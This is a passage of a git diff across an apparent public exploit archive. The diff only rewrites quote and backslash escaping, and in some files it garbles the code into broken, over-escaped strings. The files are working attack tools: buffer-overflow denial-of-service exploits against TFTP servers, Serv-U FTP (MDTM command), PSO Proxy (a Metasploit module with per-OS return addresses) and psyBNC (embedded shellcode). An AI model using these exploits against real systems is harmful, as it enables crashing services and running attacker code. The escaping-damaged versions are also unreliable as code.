nil, proc['pid']) - fail_with(Failure::Unknown, "Error while executing the payload") + print_status(\"Injecting the payload into SYSTEM process: #{proc[\'name\']}\") + unless execute_shellcode(payload.encoded, nil, proc[\'pid\']) + fail_with(Failure::Unknown, \"Error while executing the payload\") end end diff --git a/platforms/windows/dos/10603.c b/platforms/windows/dos/10603.c index dcb6c6fb0..b2c00c3c8 100755 --- a/platforms/windows/dos/10603.c +++ b/platforms/windows/dos/10603.c @@ -14,43 +14,43 @@ #include #include -#pragma comment(lib, "ws2_32.lib") +#pragma comment(lib, \"ws2_32.lib\") char Buffer_Overflow[] = -"\x00\x02" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes... -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\0" -"netascii" -"\0"; +\"\\x00\\x02\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // A = 41. 300 bytes... +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" +\"\\0\" +\"netascii\" +\"\\0\"; void main(int argc, char *argv[]) { @@ -62,52 +62,52 @@ SOCKET mysocket; int destPORT = 69; if (argc < 2){ -printf("\nVulnerability: Remote Buffer Overflow Exploit\n"); -printf("Impact: Remote Denial of Service Attack\n"); -printf("Vulnerable Application: TFTP Daemon Version 1.9\n"); -printf("\nAuthor: Socket_0x03\n"); -printf("Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\n"); -printf("Website: www.teraexe.com\n"); -printf("\nUsage: exploit + IP Address\n"); -printf("Example: exploit 192.168.1.100\n"); +printf(\"\\nVulnerability: Remote Buffer Overflow Exploit\\n\"); +printf(\"Impact: Remote Denial of Service Attack\\n\"); +printf(\"Vulnerable Application: TFTP Daemon Version 1.9\\n\"); +printf(\"\\nAuthor: Socket_0x03\\n\"); +printf(\"Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\\n\"); +printf(\"Website: www.teraexe.com\\n\"); +printf(\"\\nUsage: exploit + IP Address\\n\"); +printf(\"Example: exploit 192.168.1.100\\n\"); return; } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) { -printf("No winsock suitable version found!"); +printf(\"No winsock suitable version found!\"); return; } mysocket = socket(AF_INET, SOCK_DGRAM , 0); if(mysocket==INVALID_SOCKET){ -printf("Error: Cannot create a socket.\n"); +printf(\"Error: Cannot create a socket.\\n\"); exit(1); } -printf("Resolving IP Address.\n"); +printf(\"Resolving IP Address.\\n\"); if ((pTarget = gethostbyname(argv[2])) == NULL){ -printf("Error: Resolve of %s failed.\n", argv[1]); +printf(\"Error: Resolve of %s failed.\\n\", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons(destPORT); -printf("Connecting to Daemon 1.9\n"); +printf(\"Connecting to Daemon 1.9\\n\"); if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){ -printf("Error: Could not connect to TFTP Daemon\n"); +printf(\"Error: Could not connect to TFTP Daemon\\n\"); exit(1); } -printf("Connection Completed.\n"); +printf(\"Connection Completed.\\n\"); Sleep(10); -printf("Sending packet.\n"); +printf(\"Sending packet.\\n\"); if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){ -printf("Error sending packet.\n"); +printf(\"Error sending packet.\\n\"); closesocket(mysocket); exit(1); } -printf("Remote Buffer Overflow Completed.\n"); +printf(\"Remote Buffer Overflow Completed.\\n\"); closesocket(mysocket); WSACleanup(); @@ -117,7 +117,7 @@ WSACleanup(); Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. -C:\>exploit +C:\\>exploit Vulnerability: Remote Buffer Overflow Exploit Impact: Remote Denial of Service Attack @@ -130,12 +130,12 @@ Website: www.teraexe.com Usage: exploit + IP Address Example: exploit 192.168.1.100 -C:\>exploit 192.168.1.101 +C:\\>exploit 192.168.1.101 Resolving IP Address. Connecting to Daemon 1.9 Connection Completed. Sending packet. Remote Buffer Overflow Completed. -C:\> +C:\\> */ \ No newline at end of file diff --git a/platforms/windows/dos/16790.rb b/platforms/windows/dos/16790.rb index 5b45849c3..0c2a8d91b 100755 --- a/platforms/windows/dos/16790.rb +++ b/platforms/windows/dos/16790.rb @@ -18,43 +18,43 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow', - 'Description' => %q{ + \'Name\' => \'PSO Proxy v0.91 Stack Buffer Overflow\', + \'Description\' => %q{ This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten. }, - 'Author' => 'Patrick Webster ', - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9262 $', - 'References' => + \'Author\' => \'Patrick Webster \', + \'License\' => MSF_LICENSE, + \'Version\' => \'$Revision: 9262 $\', + \'References\' => [ - [ 'CVE', '2004-0313' ], - [ 'OSVDB', '4028' ], - [ 'URL', 'http://www.milw0rm.com/exploits/156' ], - [ 'BID', '9706' ], + [ \'CVE\', \'2004-0313\' ], + [ \'OSVDB\', \'4028\' ], + [ \'URL\', \'http://www.milw0rm.com/exploits/156\' ], + [ \'BID\', \'9706\' ], ], - 'DefaultOptions' => + \'DefaultOptions\' => { - 'EXITFUNC' => 'thread', + \'EXITFUNC\' => \'thread\', }, - 'Payload' => + \'Payload\' => { - 'Space' => 370, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500, + \'Space\' => 370, + \'BadChars\' => \"\\x00\\x0a\\x0d\\x20\", + \'StackAdjustment\' => -3500, }, - 'Platform' => 'win', - 'Targets' => + \'Platform\' => \'win\', + \'Targets\' => [ # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en. - [ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll - [ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll - [ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll - [ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll - [ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll + [ \'Windows 2000 Pro SP0-4 English\', { \'Ret\' => 0x75023112 } ], # call ecx ws2help.dll + [ \'Windows 2000 Pro SP0-4 French\', { \'Ret\' => 0x74fa3112 } ], # call ecx ws2help.dll + [ \'Windows 2000 Pro SP0-4 Italian\', { \'Ret\' => 0x74fd3112 } ], # call ecx ws2help.dll + [ \'Windows XP Pro SP0/1 English\', { \'Ret\' => 0x71aa396d } ], # call ecx ws2help.dll + [ \'Windows XP Pro SP2 English\', { \'Ret\' => 0x71aa3de3 } ], # call ecx ws2help.dll ], - 'Privileged' => false, - 'DisclosureDate' => 'Feb 20 2004' + \'Privileged\' => false, + \'DisclosureDate\' => \'Feb 20 2004\' )) register_options( @@ -65,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - sock.put("GET / HTTP/1.0\r\n\r\n") + sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\") banner = sock.get(-1,3) - if (banner =~ /PSO Proxy 0\.9/) + if (banner =~ /PSO Proxy 0\\.9/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe @@ -77,9 +77,9 @@ class Metasploit3 < Msf::Exploit::Remote connect exploit = rand_text_alphanumeric(1024, payload_badchars) - exploit += [target['Ret']].pack('V') + payload.encoded + exploit += [target[\'Ret\']].pack(\'V\') + payload.encoded - sock.put(exploit + "\r\n\r\n") + sock.put(exploit + \"\\r\\n\\r\\n\") disconnect handler diff --git a/platforms/windows/dos/23760.pl b/platforms/windows/dos/23760.pl index d8896723b..c5f0e2813 100755 --- a/platforms/windows/dos/23760.pl +++ b/platforms/windows/dos/23760.pl @@ -11,25 +11,25 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m ## I do not take responsibility for the use of this code use IO::Socket qw(:DEFAULT :crlf); -print "Serv-u MDTM Buffer overflow - by saintjmf\n"; +print \"Serv-u MDTM Buffer overflow - by saintjmf\\n\"; ## Get Host port unsername and password -my $host = shift || die print "\nUsage: \n"; -my $port = shift || die print "\nUsage: \n"; +my $host = shift || die print \"\\nUsage: \\n\"; +my $port = shift || die print \"\\nUsage: \\n\"; -$username = shift || die print "\nUsage: \n"; -$password = shift || die print "\nUsage: \n"; +$username = shift || die print \"\\nUsage: \\n\"; +$password = shift || die print \"\\nUsage: \\n\"; ## Create Socket -my $socket = IO::Socket::INET->new("$host:$port") or die print "\nUnable to connect -- $!\n"; +my $socket = IO::Socket::INET->new(\"$host:$port\") or die print \"\\nUnable to connect -- $!\\n\"; -print "connecting...............\n\n"; +print \"connecting...............\\n\\n\"; connecter($socket); -print "Server should be stopped\n"; +print \"Server should be stopped\\n\"; ## Sub that sends username, password and exploit @@ -39,20 +39,20 @@ sub connecter{ my $socket2 = shift; my $message2 = <$socket2>; chomp $message2; - print "$message2\n"; + print \"$message2\\n\"; sleep(5); - print $socket2 "user $username",CRLF; + print $socket2 \"user $username\",CRLF; $message2 = <$socket2>; chomp $message2; - print "$message2\n"; + print \"$message2\\n\"; sleep (5); - print $socket2 "pass $password", CRLF; + print $socket2 \"pass $password\", CRLF; $message2 = <$socket2>; chomp $message2; - print "$message2\n"; + print \"$message2\\n\"; sleep (4); - print "Sending MDTM Overflow.....\n"; - print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF; + print \"Sending MDTM Overflow.....\\n\"; + print $socket2 \"MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt\" ,CRLF; } diff --git a/platforms/windows/dos/23761.c b/platforms/windows/dos/23761.c index 08c570c63..660190eab 100755 --- a/platforms/windows/dos/23761.c +++ b/platforms/windows/dos/23761.c @@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user. -/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit. +/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow PoC DoS exploit. * * This program will send an overly large filename parameter when calling * the Serv-U FTP MDTM command. Although arbitrary code execution is @@ -34,9 +34,9 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m int main(int argc, char *argv[]) { if(argc < 5) { - printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n"); - printf("by shaun2k2 - .\n\n"); - printf("Usage: %s \n", argv[0]); + printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\"); + printf(\"by shaun2k2 - .\\n\\n\"); + printf(\"Usage: %s \\n\", argv[0]); exit(-1); } @@ -50,13 +50,13 @@ int main(int argc, char *argv[]) { /* lookup IP address of supplied hostname. */ if((he = gethostbyname(argv[1])) == NULL) { - printf("Couldn't resolve %s!\n", argv[1]); + printf(\"Couldn\'t resolve %s!\\n\", argv[1]); exit(-1); } /* create socket. */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { - perror("socket()"); + perror(\"socket()\"); exit(-1); } @@ -65,26 +65,26 @@ int main(int argc, char *argv[]) { dest.sin_port = htons(atoi(argv[2])); dest.sin_addr = *((struct in_addr *)he->h_addr); - printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n"); - printf("by shaun2k2 - .\n\n"); + printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\"); + printf(\"by shaun2k2 - .\\n\\n\"); - printf("Crafting exploit buffer...\n\n"); + printf(\"Crafting exploit buffer...\\n\\n\"); /* craft exploit buffers. */ - memset(bigbuf, 'a', 6000); - sprintf(loginbuf, "USER %s\n", argv[3]); - sprintf(passwdbuf, "PASS %s\n", argv[4]); - sprintf(explbuf, "MDTM 20031111111111+%s\r\n", bigbuf); + memset(bigbuf, \'a\', 6000); + sprintf(loginbuf, \"USER %s\\n\", argv[3]); + sprintf(passwdbuf, \"PASS %s\\n\", argv[4]); + sprintf(explbuf, \"MDTM 20031111111111+%s\\r\\n\", bigbuf); - printf("[+] Connecting...\n"); + printf(\"[+] Connecting...\\n\"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) { - perror("connect()"); + perror(\"connect()\"); exit(-1); } - printf("[+] Connected!\n\n"); + printf(\"[+] Connected!\\n\\n\"); - printf("[+] Sending exploit buffers...\n"); + printf(\"[+] Sending exploit buffers...\\n\"); sleep(1); /* give the serv-u server time to sort itself out. */ send(sock, loginbuf, strlen(loginbuf), 0); sleep(2); /* wait for 2 secs. */ @@ -92,11 +92,11 @@ int main(int argc, char *argv[]) { sleep(2); /* wait before sending large MDTM command. */ send(sock, explbuf, strlen(explbuf), 0); sleep(1); /* wait before closing the socket. */ - printf("[+] Exploit buffer sent!\n\n"); + printf(\"[+] Exploit buffer sent!\\n\\n\"); close(sock); - printf("[+] Done! Check if the Serv-U server has crashed.\n"); + printf(\"[+] Done! Check if the Serv-U server has crashed.\\n\"); return(0); } diff --git a/platforms/windows/dos/23762.c b/platforms/windows/dos/23762.c index a3fe00ce4..df57b218c 100755 --- a/platforms/windows/dos/23762.c +++ b/platforms/windows/dos/23762.c @@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user. -/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow +/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow PoC DoS exploit. * * This program will send an overly large filename @@ -45,12 +45,12 @@ login and password. int main(int argc, char *argv[]) { if(argc < 5) { - printf("Serv-U 'MDTM' buffer overflow -DoS exploit.\n"); - printf("by shaun2k2 - -.\n\n"); - printf("Usage: %s - \n", argv[0]); + printf(\"Serv-U \'MDTM\' buffer overflow +DoS exploit.\\n\"); + printf(\"by shaun2k2 - +.\\n\\n\"); + printf(\"Usage: %s + \\n\", argv[0]); exit(-1); } @@ -63,7 +63,7 @@ DoS exploit.\n"); /* lookup IP address of supplied hostname. */ if((he = gethostbyname(argv[1])) == NULL) { - printf("Couldn't resolve %s!\n", + printf(\"Couldn\'t resolve %s!\\n\", argv[1]); exit(-1); } @@ -71,7 +71,7 @@ argv[1]); /* create socket. */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { - perror("socket()"); + perror(\"socket()\"); exit(-1); } @@ -81,29 +81,29 @@ argv[1]); dest.sin_addr = *((struct in_addr *)he->h_addr); - printf("Serv-U 'MDTM' buffer overflow DoS -exploit.\n"); - printf("by shaun2k2 - -.\n\n"); + printf(\"Serv-U \'MDTM\' buffer overflow DoS +exploit.\\n\"); + printf(\"by shaun2k2 - +.\\n\\n\"); - printf("Crafting exploit buffer...\n\n"); + printf(\"Crafting exploit buffer...\\n\\n\"); /* craft exploit buffers. */ - sprintf(loginbuf, "USER %s\n", argv[3]); - sprintf(passwdbuf, "PASS %s\n", argv[4]); - explbuf = "MDTM -20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt"; + sprintf(loginbuf, \"USER %s\\n\", argv[3]); + sprintf(passwdbuf, \"PASS %s\\n\", argv[4]); + explbuf = \"MDTM +20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt\"; - printf("[+] Connecting...\n"); + printf(\"[+] Connecting...\\n\"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) { - perror("connect()"); + perror(\"connect()\"); exit(-1); } - printf("[+] Connected!\n\n"); + printf(\"[+] Connected!\\n\\n\"); - printf("[+] Sending exploit buffers...\n"); + printf(\"[+] Sending exploit buffers...\\n\"); sleep(1); /* give the serv-u server time to sort itself out. */ send(sock, loginbuf, strlen(loginbuf), 0); @@ -114,12 +114,12 @@ command. */ send(sock, explbuf, strlen(explbuf), 0); sleep(1); /* wait before closing the socket. */ - printf("[+] Exploit buffer sent!\n\n"); + printf(\"[+] Exploit buffer sent!\\n\\n\"); close(sock); - printf("[+] Done! Check if the Serv-U server -has crashed.\n"); + printf(\"[+] Done! Check if the Serv-U server +has crashed.\\n\"); return(0); } diff --git a/platforms/windows/dos/24952.py b/platforms/windows/dos/24952.py index 0f773665d..a1eb18017 100755 --- a/platforms/windows/dos/24952.py +++ b/platforms/windows/dos/24952.py @@ -17,31 +17,31 @@ #!/usr/bin/python import socket import sys -host = '192.168.1.32' +host = \\\'192.168.1.32\\\' port = 69 -nseh="\xCC\xCC\xCC\xCC" +nseh=\\\"\\\\xCC\\\\xCC\\\\xCC\\\\xCC\\\" #seh handler overwritten at 261 byte of shellcode but to exception triggered to use it. -seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3 +seh=\\\"\\\\x18\\\\x0B\\\\x27\\\" # Breakpoint in no SafeSEH space in Windows XP SP3 -payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00" +payload=\\\"\\\\xCC\\\"*257 + nseh + seh + \\\"\\\\x00\\\" + \\\"3137\\\" + \\\"\\\\x00\\\" #payload to get access violation: -#payload=("\x00\x01\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" -#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35" -#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e" -#"\x00") +#payload=(\\\"\\\\x00\\\\x01\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\" +#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x35\\\" +#\\\"\\\\x63\\\\x65\\\\x74\\\\x63\\\\x25\\\\x32\\\\x35\\\\x35\\\\x63\\\\x68\\\\x6f\\\\x73\\\\x74\\\\x73\\\\x00\\\\x6e\\\" +#\\\"\\\\x00\\\") -buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00" +buffer=\\\"\\\\x00\\\\x01\\\"+ payload + \\\"\\\\x06\\\" + \\\"netascii\\\" + \\\"\\\\x00\\\" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) diff --git a/platforms/windows/dos/26010.py b/platforms/windows/dos/26010.py index 0f4adc188..6d28545cd 100755 --- a/platforms/windows/dos/26010.py +++ b/platforms/windows/dos/26010.py @@ -14,12 +14,12 @@ from socket import * import sys import select -pwn = "\x00\x02" -pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00" -pwn += "A"*1200 -pwn += "\x00" +pwn = \"\\x00\\x02\" +pwn += \"\\x66\\x69\\x6c\\x65\\x2e\\x74\\x78\\x74\\x00\" +pwn += \"A\"*1200 +pwn += \"\\x00\" -address = ('192.168.200.20', 69) +address = (\'192.168.200.20\', 69) server_socket = socket(AF_INET, SOCK_DGRAM) server_socket.sendto(pwn, address) diff --git a/platforms/windows/dos/2855.py b/platforms/windows/dos/2855.py index 85a4a4e18..54179bc34 100755 --- a/platforms/windows/dos/2855.py +++ b/platforms/windows/dos/2855.py @@ -17,7 +17,7 @@ # A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers # to execute arbitrary commands or cause a denial of service. This flaw is # due to a buffer overflow error when handling an overly long transporting -# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could +# mode (more than 470 bytes) passed to a \"GET\" or \"PUT\" command, which could # be exploited by malicious users to compromise a vulnerable system or crash # an affected application. @@ -26,18 +26,18 @@ import socket import sys -host = '192.168.1.11' +host = \'192.168.1.11\' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: - print "socket() failed" + print \"socket() failed\" sys.exit(1) -filename = "A" -mode = "netascii" + "A" * 469 -da = "\x00\x02" + filename + "\0" + mode + "\0" +filename = \"A\" +mode = \"netascii\" + \"A\" * 469 +da = \"\\x00\\x02\" + filename + \"\\0\" + mode + \"\\0\" s.sendto(da, (host, port)) # milw0rm.com [2006-11-27] diff --git a/platforms/windows/dos/29285.txt b/platforms/windows/dos/29285.txt index 5eccf930b..05d281a8d 100755 --- a/platforms/windows/dos/29285.txt +++ b/platforms/windows/dos/29285.txt @@ -2,7 +2,7 @@ source: http://www.securityfocus.com/bid/21612/info Multiple applications are prone to a denial-of-service vulnerability. -A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service. +A remote attacker may exploit this vulnerability by presenting malicious \'WMV\', \'MID\', and \'AVI\' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service. It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. diff --git a/platforms/windows/dos/29721.pl b/platforms/windows/dos/29721.pl index e6094f24e..b8b18973f 100755 --- a/platforms/windows/dos/29721.pl +++ b/platforms/windows/dos/29721.pl @@ -14,20 +14,20 @@ An attacker can exploit these issues to execute arbitrary code within the contex use Socket; -$retPtr = "\x60\xef\xff\xbf"; +$retPtr = \"\\x60\\xef\\xff\\xbf\"; # Pirated from some guy called gunslinger_ -$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80"; +$exit1code = \"\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\"; -$code = "\x90" x 120 . $exit1code . $retPtr; +$code = \"\\x90\" x 120 . $exit1code . $retPtr; -socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket"; -bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667"; -listen(SOCKET,5) or die "Couldn't listen on port"; +socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")) or die \"Couldn\'t open socket\"; +bind(SOCKET, sockaddr_in(6667, inet_aton(\"127.0.0.1\"))) or die \"Couldn\'t bind to port 6667\"; +listen(SOCKET,5) or die \"Couldn\'t listen on port\"; while(accept(CLIENT,SOCKET)){ sleep 1; select((select(CLIENT), $|=1)[0]); - print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n"; + print CLIENT \":-psyBNC!~cjd\\@ef.net PRIVMSG luser : :($code\\r\\n\"; } close(SOCKET); diff --git a/platforms/windows/dos/3127.c b/platforms/windows/dos/3127.c index 309f3dfd6..43c7b39c0 100755 --- a/platforms/windows/dos/3127.c +++ b/platforms/windows/dos/3127.c @@ -11,10 +11,10 @@ *Coded by Marsu * ************************************************************************/ -#include "winsock2.h" -#include "stdio.h" -#include "stdlib.h" -#pragma comment(lib, "ws2_32.lib") +#include \"winsock2.h\" +#include \"stdio.h\" +#include \"stdlib.h\" +#pragma comment(lib, \"ws2_32.lib\") int main(int argc, char* argv[]) { @@ -28,58 +28,58 @@ int main(int argc, char* argv[]) if (argc!=3) { - printf("[+] Usage: %s \n",argv[0]); + printf(\"[+] Usage: %s 